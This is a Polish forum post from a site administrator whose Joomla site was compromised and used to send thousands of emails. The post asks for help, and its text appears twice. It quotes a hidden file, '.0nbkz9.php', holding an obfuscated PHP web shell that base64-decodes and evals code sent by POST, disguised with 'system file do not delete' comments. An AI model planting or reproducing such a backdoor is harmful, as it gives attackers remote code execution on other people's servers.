robakx1
14-03-2013, 12:01
Witam
Na stronę którą się opiekuje nastąpił włam, firma hostingowa nie bardzo chce pomóc. Wjęc mam nadzieje że tu uzyskam jakoś pomoc.
Od firmy hostingowej otrzymaliśmy e-mail że joomla został shakowana i wysłano z niej tysiące e-maili.
W katalogu components utworzony został plik .0nbkz9.php który zawiera taki kod:
<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhb ChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZS k7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x6 5";eval($___($__));
Tu znalazłem translator dla tego lub podobnego problemu http://www.daniweb.com/web-development/php/threads/415939/i-found-this-in-the-root-of-my-web-site
Dysponuje równierz logami serwera od dania wczesniej niż utworzony plik .0nbkz9.php - jeśli to komuś pomoże mi pomóc
Pozdrawiam
Na stronę którą się opiekuje nastąpił włam, firma hostingowa nie bardzo chce pomóc. Wjęc mam nadzieje że tu uzyskam jakoś pomoc.
Od firmy hostingowej otrzymaliśmy e-mail że joomla został shakowana i wysłano z niej tysiące e-maili.
W katalogu components utworzony został plik .0nbkz9.php który zawiera taki kod:
<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhb ChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZS k7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x6 5";eval($___($__));
Tu znalazłem translator dla tego lub podobnego problemu http://www.daniweb.com/web-development/php/threads/415939/i-found-this-in-the-root-of-my-web-site
Dysponuje równierz logami serwera od dania wczesniej niż utworzony plik .0nbkz9.php - jeśli to komuś pomoże mi pomóc
Pozdrawiam